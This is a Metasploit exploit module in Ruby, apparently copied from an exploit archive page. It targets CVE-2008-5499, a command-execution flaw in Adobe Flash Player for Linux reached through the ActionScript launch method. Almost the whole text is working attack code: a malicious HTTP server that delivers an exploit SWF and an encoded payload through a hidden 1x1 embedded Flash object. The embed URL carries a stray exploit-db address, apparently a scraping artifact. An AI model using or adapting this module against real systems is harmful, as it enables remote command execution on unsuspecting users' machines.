|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107  |  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpServer::HTML  def initialize(info = {})  super(update_info(info,  'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',  'Description'=> %q{  This module exploits a vulnerability in Adobe Flash Player for Linux,  version10.0.12.36 and 9.0.151.0 and prior.  An input validation vulnerability allows command execution when the browser  loads a SWF file which contains shell metacharacters in the arguments to  the ActionScript launch method.  The victim must have Adobe AIR installed for the exploit to work. This module  was tested against version 10.0.12.36 (10r12_36).  },  'License'=> MSF_LICENSE,  'Author' =>  [  '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version  ],  'References' =>  [  ['CVE', '2008-5499'],  ['OSVDB', '50796'],  ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],  ['URL', 'https://www.securityfocus.com/bid/32896/exploit']  ],  'DefaultOptions' =>  {  'HTTP::compression' => 'gzip',  'HTTP::chunked' => true  },  'Platform' => 'unix', # so unix cmd exec payloads are ok  'Arch' => ARCH_CMD,  'Targets'=>  [  [ 'Automatic', {}],  ],  'DisclosureDate' => 'Dec 17 2008',  'DefaultTarget'=> 0))  end  def exploit  path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )  fd = File.open( path, "rb" )  @swf = fd.read(fd.stat.size)  fd.close  super  end  def on_request_uri(cli, request)  msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"  trigger = @swf  trigger_file = rand_text_alpha(rand(6)+3) + ".swf"  obj_id = rand_text_alpha(rand(6)+3)  if request.uri.match(/\.swf/i)  print_status("#{msg} Sending Exploit SWF")  send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })  return  end  if request.uri.match(/\.txt/i)  send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })  return  end  html =<<-EOS  <html>  <head>  </head>  <body>  <center>  <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">  <param name="movie" value="#{get_resource}#{trigger_file}" />  <embed src="https://www.exploit-db.com/exploits/18761/#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"  type="application/x-shockwave-flash"  pluginspage="http://www.macromedia.com/go/getflashplayer">  </embed>  </object>  </center>  </body>  </html>  EOS  print_status("#{msg} Sending HTML...")  send_response(cli, html, { 'Content-Type' => 'text/html' })  end end  |